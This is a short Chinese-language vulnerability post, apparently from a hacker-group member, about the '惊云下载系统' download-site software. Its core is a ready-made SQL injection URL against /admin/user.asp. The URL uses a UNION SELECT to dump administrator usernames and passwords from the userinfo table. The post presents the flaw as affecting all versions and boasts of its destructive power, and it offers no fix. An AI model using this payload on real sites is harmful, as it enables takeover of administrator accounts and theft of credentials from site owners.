漏洞发现:深白色[L.U.C]中国蓝客联盟
漏洞程序:惊云下载系统
漏洞类型:SQL注入
影响版本:所有版本
漏洞资料:
惊云下载系统可说是漏洞百出啊!但下面这种方法可是最实用的!
这个漏洞方法大家可能不陌生吧.
但对惊云下载系统全部版本绝对有很大的杀伤利!
来看看吧,直接得到后台管理员帐号密码
测试方法:
下载系统网站地址/admin/user.asp?user=test'%20union%20select%201,2,3,4,user,6,pwd,8,9,10,11,12,13,%2014%20from%20userinfo%20where%20dj=3%20and%20'1'='1">http://惊云下载系统网站地址/admin/user.asp?user=test'%20union%20select%201,2,3,4,user,6,pwd,8,9,10,11,12,13,%2014%20from%20userinfo%20where%20dj=3%20and%20'1'='1